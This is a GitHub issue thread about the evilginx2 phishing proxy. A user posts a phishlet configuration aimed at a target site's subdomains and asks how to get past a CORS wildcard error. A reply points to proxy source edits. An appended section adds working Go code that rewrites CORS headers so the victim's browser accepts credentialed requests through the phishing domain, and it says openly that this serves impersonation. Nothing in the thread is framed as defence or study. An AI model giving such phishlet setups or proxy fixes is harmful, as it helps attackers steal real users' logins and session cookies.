
'Access-Control-Allow-Origin' header in the response must not be the wildcard #291

Closed
DavidGrahambell opened this issue May 2, 2019 · 1 comment

Comments

@DavidGrahambell

DavidGrahambell commented May 2, 2019

Hi,

First of all, I would like to thank you for your efforts on this tool. I have a little question:

I have a config with three subdomains, similar to facebook, and I get the "'Access-Control-Allow-Origin' header in the response must not be the wildcard" error for one of my phishing subs. I have checked the following similar issue and can verify that I have unique phish_sub values:

#244

I just wonder under what circumstances Evilginx2 can't pass the origin policy?

Best regards,

Phishlet summary

```yaml
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'mytarget.com', session: true, is_landing: true}
  - {phish_sub: 'static', orig_sub: 'static', domain: 'mytarget-be.com', session: false, is_landing: false}
  - {phish_sub: 'user', orig_sub: 'user', domain: 'mytarget-be.com', session: false, is_landing: false}
sub_filters:
  - {triggers_on: 'www.mytarget.com', orig_sub: 'www', domain: 'mytarget.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', ..}
  - {triggers_on: 'www.mytarget.com', orig_sub: 'static', domain: 'mytarget-be.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', ..}
  - {triggers_on: 'www.mytarget.com', orig_sub: 'user', domain: 'mytarget-be.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', ..}
  - {triggers_on: 'static.mytarget-be.com', orig_sub: 'static', domain: 'mytarget-be.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', ..}
  - {triggers_on: 'user.mytarget-be.com', orig_sub: 'user', domain: 'mytarget-be.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', ..}
```

When I check the legitimate and phished requests on my webserver, I can see that the Origin header is set properly as "https://www.mytarget.com":

```
x.x.x.x - - x.x.x.x - - [02/May/2019:10:47:44 +0300] "OPTIONS /api/modules/GetAppModule HTTP/1.1" 204 0 "https://www.mytarget.com/" "653" "/api/modules/GetAppModule" "Safari/537.36" "-" "https://www.mytarget.com"

y.y.y.y - - y.y.y.y - - [02/May/2019:10:50:33 +0300] "OPTIONS /api/modules/GetAppModule HTTP/1.1" 204 0 "https://www.mytarget.com/" "671" "/api/modules/GetAppModule" "Safari/537.36" "-" "https://www.mytarget.com"
```

Console output:

debug_out.txt

@hash3liZer

If the response from a website returns a CSP policy then, I think, it's great to return the wildcard in the Access-Control header. However, you can change this behaviour by editing one or more lines in the http_proxy.go file. Here's the thread:

#280
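The error in the issue title is raised by the victim's browser, not by the proxy: under the Fetch standard a cross-origin request made with credentials (cookies, `credentials: 'include'`) is only allowed if `Access-Control-Allow-Origin` echoes the requesting origin exactly and `Access-Control-Allow-Credentials: true` is present; a wildcard `*` is rejected in that mode even though it is fine for credential-less requests. That is the circumstance the question asks about: a site whose API calls carry cookies will fail through a proxy that answers with `*`. The Go block below is an added example written for this page, not evilginx2's code and not the change discussed in #280. It models the browser-side check and the response-side fix a proxy would apply (reflecting the browser's `Origin` instead of `*`); the hostname `https://www.phish.example` is an assumption, and `reflectOrigin` is a hypothetical helper that a real proxy would call from an `httputil.ReverseProxy.ModifyResponse` hook.

```go
package main

import (
	"fmt"
	"net/http"
)

// phishOrigin is the origin the victim's browser sends (assumed hostname,
// not from the issue); in a real deployment it is the proxy's own domain.
const phishOrigin = "https://www.phish.example"

// corsAllowed models the browser-side CORS response check that produces the
// error in the issue title. requestOrigin is the browser's Origin header,
// withCredentials is true when the request carries cookies (credentials
// mode 'include'). It returns whether the response is usable and, if not, why.
func corsAllowed(resp http.Header, requestOrigin string, withCredentials bool) (bool, string) {
	acao := resp.Get("Access-Control-Allow-Origin")
	switch {
	case acao == "":
		return false, "missing Access-Control-Allow-Origin"
	case acao == "*" && !withCredentials:
		// Wildcard is acceptable only for credential-less requests.
		return true, ""
	case acao == "*" && withCredentials:
		return false, "Access-Control-Allow-Origin must not be the wildcard when credentials are included"
	case acao != requestOrigin:
		return false, "Access-Control-Allow-Origin does not match the request origin"
	case withCredentials && resp.Get("Access-Control-Allow-Credentials") != "true":
		return false, "Access-Control-Allow-Credentials must be 'true' when credentials are included"
	}
	return true, ""
}

// reflectOrigin is the response-side fix: replace a wildcard with the origin
// the browser actually sent, allow credentials for it, and add Vary: Origin so
// caches do not serve one origin's answer to another. It reports whether the
// header was rewritten. (Hypothetical helper, not evilginx2's implementation.)
func reflectOrigin(resp http.Header, browserOrigin string) bool {
	if browserOrigin == "" || resp.Get("Access-Control-Allow-Origin") != "*" {
		return false
	}
	resp.Set("Access-Control-Allow-Origin", browserOrigin)
	resp.Set("Access-Control-Allow-Credentials", "true")
	resp.Add("Vary", "Origin")
	return true
}

func main() {
	// Constructed upstream response headers: the wildcard case from the issue.
	upstream := http.Header{}
	upstream.Set("Access-Control-Allow-Origin", "*")

	ok, reason := corsAllowed(upstream, phishOrigin, true)
	fmt.Printf("before rewrite, with cookies: allowed=%v (%s)\n", ok, reason)

	reflectOrigin(upstream, phishOrigin)
	ok, reason = corsAllowed(upstream, phishOrigin, true)
	fmt.Printf("after rewrite, with cookies:  allowed=%v (%s)\n", ok, reason)
}
```

Note that reflecting an arbitrary `Origin` is exactly what a CORS hardening guide tells a legitimate site not to do; it is acceptable here only because the proxy is deliberately impersonating the upstream for a single phishing domain, and it still has to rewrite the upstream's own origin in other headers and bodies (which is what the phishlet's `sub_filters` are for).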
